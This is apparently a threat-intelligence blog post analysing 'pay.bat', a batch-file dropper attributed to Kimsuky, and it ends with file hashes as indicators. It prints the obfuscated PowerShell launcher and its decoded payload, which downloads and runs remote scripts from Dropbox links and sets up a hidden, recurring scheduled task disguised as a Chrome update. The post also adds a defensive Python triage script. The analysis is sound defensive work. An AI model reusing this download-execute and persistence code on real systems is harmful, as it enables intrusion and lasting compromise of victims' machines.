lazarusholic

Everyday is lazarus.dayβ

Malware made by APT Kimsuky - pay.bat (2024.11.27)

2024-12-05, Sakai
https://wezard4u.tistory.com/429348
#Kimsuky

Contents

Today I will write about the malware pay.bat (2024.11.27) made by APT Kimsuky.
The distinguishing feature of this malware is that it abuses a batch file; once it runs, it appears to download something from a Dropbox share that has since been taken down.
Hashes
File name: pay.bat
Size: 1,687 bytes
MD5:b262ac518c0114f414aaedbb4ef7c728
SHA-1:fd02470c6cc4ceb5fad3589d02e5148a8c738b83
SHA-256:8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b
Code contained in the malware
@echo off
powershell/W 1 -ep bypass -w hidden -command $cmkGna
BV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0
aCAo(J)GVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAn
JGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVt(c)C5w
czEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwu(Z)HJvcGJveHVzZXJjb250ZW50LmNvbS9zY
2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT(1)yOGZlMHZpaWVyMW13dj
lhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0Z
W0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJH(N)0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZG
uZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwu
ZX(h)lJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1
yb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIi(Y)geyRhYmMgPSBKb2luLVBhdGggKC
RlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdW
xlZFRhc2tUcmlnZ2VyIC1Pbm(N)lIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25J
bnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbm(d)zID0gTmV3LVNjaGVkdW(x)l
ZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hy
b21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbi(A)tVHJpZ2dlciAkdHJpZ2dlciAtU2V0dG
luZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0Ln
BzMSI7IHdnZXQgLVVyaS(A)iaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21j
c2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3(J)sa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW(0)2czl5
Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAk
YWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);^&(
'{5}{0}{2}{1}{3}{4}{6}'-f 'o
ke','xp','-E','res','sio','Inv','n') $U9zBwFeD
Code analysis
Since the Base64 layer has to be stripped first, I will use CyberChef for that.
Decoding it gives the following result:
$ppp = Join-Path ($env:AppData) "chrome(.)ps1";
$str = '$aaa = Join-Pa(t)h ($env:AppData) "temp(.)ps1"; wget -Uri "hxxxs://dl(.)dropboxusercontent(.)com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f(.)txt?rlkey=r8fe0viie(r)1mwv9azk5awy5s9&st=yvqqfdfy&dl=0" -OutFile $aaa; & $aaa; Remove(-)Item -Path $aaa -Force;';
$str | Out-File -FilePath $ppp -Encoding UTF8;
$action = New-ScheduledTaskAction -Exec(u)te 'PowerShell(.)exe' -Argument '-Win(d)owStyle Hidden -nop -NonIn(t)eractive -NoProfile -Execution(P)olicy Bypass -Command "(&) {$abc = Join-Path ($(e)nv:AppData) \"chrome(.)ps1\"; & $abc;}"';
$trigger = New-ScheduledTa(s)kTrigger -Once -At (G(e)t-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30);
$settings = New-ScheduledTaskS(e)ttingsSet -Hi(d)den;
R(e)gister-ScheduledTask -TaskName "ChromeUpdateTaskMachine" -Action $action -Trigger $trigger -Settings $settings;
$aaa = Join-Pat(h) ($env:AppData) "system_first(.)ps1";
wget -Uri "hxxxs://dl(.)dropboxusercontent(.)com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x(.)txt?rlkey=5nbbqe(g)c5a77r76hiym6s9y2h&st=727cs1mx&dl=0" -OutFile $aaa;
& $aaa;
Remove-Item -Path $aaa -Force;
PowerShell script
1. A PowerShell script named chrome(.)ps1 …
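As an added example, not code from the original post or the analyst's own tooling, the Python script below automates the decoding step done with CyberChef above: it resolves the '{5}{0}...' -f format-operator trick that hides Invoke-Expression, base64-decodes the embedded payload, and pulls out the download URL, dropped file name and scheduled-task name a defender would hunt for. The batch text it runs on is a constructed stand-in with a placeholder URL and a shortened inner script, not the real pay.bat.

```python
import base64
import re

# Constructed sample modelled on the pay.bat launcher: same shape, but a
# placeholder URL and a much shorter inner script (not the real payload).
SAMPLE_INNER = (
    '$ppp = Join-Path ($env:AppData) "chrome.ps1"; '
    'wget -Uri "https://dl.example.invalid/scl/fi/abc/santa2-f.txt?dl=0" -OutFile $ppp; '
    'Register-ScheduledTask -TaskName "ChromeUpdateTaskMachine" -Action $action;'
)
SAMPLE_BAT = (
    "@echo off\n"
    "powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('"
    + base64.b64encode(SAMPLE_INNER.encode("utf-8")).decode("ascii")
    + "');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);"
    "^&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD\n"
)

# '{5}{0}...' -f 'a','b',... is PowerShell's format operator reordering fragments
FMT_RE = re.compile(r"'((?:\{\d+\})+)'\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')")
B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")

def resolve_format_operator(text):
    """Replace each 'fmt' -f 'a','b' expression with the string it assembles."""
    def _sub(m):
        parts = re.findall(r"'([^']*)'", m.group(2))
        return "'" + m.group(1).format(*parts) + "'"
    return FMT_RE.sub(_sub, text)

def extract_indicators(script):
    """Network, persistence and dropper artefacts from decoded PowerShell."""
    return {
        "urls": re.findall(r"https?://[^\s\"']+", script),
        "task_names": re.findall(r'-TaskName\s+"([^"]+)"', script),
        "dropped_files": re.findall(r'Join-Path\s+\(\$env:AppData\)\s+"([^"]+)"', script),
    }

def triage(bat_text):
    """Static triage of a pay.bat-style launcher: deobfuscate, decode, list IoCs."""
    cleaned = resolve_format_operator(bat_text)            # 'Inv','oke',... -> Invoke-Expression
    launcher = re.search(r"\^&\('([^']+)'\)", cleaned)     # what the ^&(...) call resolves to
    decoded = [base64.b64decode(b).decode("utf-8") for b in B64_RE.findall(cleaned)]
    report = {"invoked_with": launcher.group(1) if launcher else None,
              "hidden_bypass": "-ep bypass" in cleaned and "-w hidden" in cleaned,
              "decoded": decoded}
    for script in decoded:
        for key, values in extract_indicators(script).items():
            report.setdefault(key, []).extend(values)
    return report
```

Running triage(SAMPLE_BAT) reports the resolved launcher name, the hidden-window/bypass flags, the decoded script and the extracted indicators; the same functions can be pointed at a real batch file read from disk.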

IoC

fd02470c6cc4ceb5fad3589d02e5148a8c738b83
b262ac518c0114f414aaedbb4ef7c728
8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b